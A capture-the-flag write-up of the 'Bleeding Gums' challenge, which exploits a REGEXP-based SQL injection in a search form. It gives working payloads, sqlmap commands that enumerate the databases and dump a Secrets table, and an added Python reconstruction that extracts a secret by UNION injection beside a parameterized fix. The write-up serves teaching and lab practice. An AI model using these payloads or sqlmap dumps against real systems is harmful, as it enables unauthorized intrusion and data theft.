2019 Stonecutters - Bleeding Gums

In honor of Bleeding Gums Murphy, who passed away 24 years ago today, I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutters "Bleeding Gums" challenge.

RIP Bleeding Gums

Bleeding Gums was an empty website aside from a single search field as seen below:


index.php

When I searched for the letter "a", I saw the table below:

Search Results

When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.

Next, I searched for years and album titles, but the query only seemed to search for Artists.
Searching for a single quote (') gave me the following SQL error:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1

I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.

With this particular challenge, I noticed that -- and # caused different error messages. For example, ' OR 1=1 -- would return a blank page, but ' OR 1=1 # would give me this error:

Error: Got error 'missing ) at offset 4' from regexp

The "from regexp" wording points at the regular-expression engine rather than the SQL parser: the search term is evidently placed inside a REGEXP pattern whose opening ( the application supplies, so an injected ) has to close that group before the quote can close the string. The injection was obviously missing a ), so I added it in various places in the query, played with the 1=1 test, and found that )' or 1=1 # returned the full table of Artists.
At this point I felt it was worth trying sqlmap again. I always confirm that sqlmap can actually exploit the injection before going further by using the --current-user option, as in the command below (the * in --data is sqlmap's custom injection marker, and the trailing %20#%20 comments out the remainder of the query):

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --current-user 

This was successful and returned the following information:

<snip>
[21:57:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[21:57:32] [INFO] fetching current user
current user:    'ctf@localhost'
[21:57:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
<snip>


I next ran sqlmap with -a (retrieve everything). No flag was discovered in this output, or I otherwise overlooked it, but I did notice another database called "ctf". Using sqlmap, I stepped through which databases existed and what tables they had.

First, I used --dbs to show me the available databases:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --dbs
<snip>
[*] ctf
[*] information_schema
[*] test
<snip>

The ctf database stuck out, as this was after all a CTF, so I then used sqlmap to list the tables in that database:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --tables -D "ctf"
<snip>
Database: ctf
[2 tables]
+---------+
| Albums  |
| Secrets |
+---------+
<snip>

Secrets looked super interesting, so I then dumped the entries of the "Secrets" table:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" -T "Secrets" --dump  

Which presented me with the flag:

Database: ctf
Table: Secrets
[1 entry]
+-------------------------------------+
| secret                              |
+-------------------------------------+
| flag{SelmaSmokesJazzCigarettes}     |
+-------------------------------------+
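The following is an added example, not the challenge's code or anything from the original post. It reconstructs the query shape that the two error messages above suggest (the search term spliced into a REGEXP pattern wrapped in parentheses; this shape, the column names, and the sample rows are all assumptions), runs the same probes by hand against an in-memory SQLite database, and then does what sqlmap automated for the Secrets dump: closes the group and the string and UNIONs in the secret. SQLite has no # comment, so the payloads use -- followed by a space where the post used #. A hardened query with a bound parameter is shown alongside so the fix is visible next to the bug.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's Albums and Secrets tables.
# Column names, rows and the secret are all made up for this example.
ALBUMS = [
    ("Alice Alto", "First", 1989),
    ("Bob Bass", "Second", 1991),
    ("Clara Cello", "Third", 1994),
    ("Bleeding Gums Murphy", "Sax on the Beach", 1990),
]
SECRET = "flag{constructed-example-not-the-real-flag}"


def regexp(pattern, value):
    """SQLite has no built-in REGEXP; register a Python one so the
    MariaDB-style 'Artist REGEXP ...' predicate works here. Case-insensitive
    to mirror MariaDB's default behaviour on non-binary strings."""
    return re.search(pattern, value, re.IGNORECASE) is not None


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("REGEXP", 2, regexp)
    conn.execute("CREATE TABLE Albums (Artist TEXT, Album TEXT, Year INTEGER)")
    conn.execute("CREATE TABLE Secrets (secret TEXT)")
    conn.executemany("INSERT INTO Albums VALUES (?, ?, ?)", ALBUMS)
    conn.execute("INSERT INTO Secrets VALUES (?)", (SECRET,))
    return conn


def search_vulnerable(conn, term):
    """Assumed shape of the challenge's query, inferred from the errors:
    the term lands inside a REGEXP pattern that the application wraps in
    parentheses, so a quote in the term breaks out of the string."""
    sql = f"SELECT Artist, Album, Year FROM Albums WHERE Artist REGEXP '({term})'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened form: the term is bound as a parameter and matched with LIKE
    (wildcards escaped), so it can neither alter the SQL nor supply a
    pathological regular expression."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT Artist, Album, Year FROM Albums WHERE Artist LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def probe(conn, term):
    """What an attacker observes for one probe: a row count or an error."""
    try:
        return ("rows", len(search_vulnerable(conn, term)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def steal_secret(conn):
    """Manual equivalent of the sqlmap dump: ')' closes the regex group and
    the string, UNION pulls the Secrets table into the result set, and the
    comment swallows the application's trailing ')'."""
    payload = ")' UNION SELECT secret, NULL, NULL FROM Secrets -- "
    rows = search_vulnerable(conn, payload)
    return [row[0] for row in rows if row[0].startswith("flag{")]


if __name__ == "__main__":
    db = make_db()
    for term in ["a", "b", "'", "' OR 1=1 -- ", ")' OR 1=1 -- "]:
        print(repr(term), "->", probe(db, term))
    print("safe search with the working payload:", search_safe(db, ")' OR 1=1 -- "))
    print("secret via UNION:", steal_secret(db))
```

The probes reproduce the post's progression: "a" and "b" return different subsets, a lone quote is a SQL syntax error, ' OR 1=1 -- leaves an unclosed ( for the regex engine, and only )' OR 1=1 -- returns every row. The same payload against search_safe is just a literal string and matches nothing.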

Another fun SQLi challenge. sqlmap is such a powerful tool that it's easy to throw it at something and expect magic to happen. That's not always the case, so when you see errors, keep trying!

-strupo_
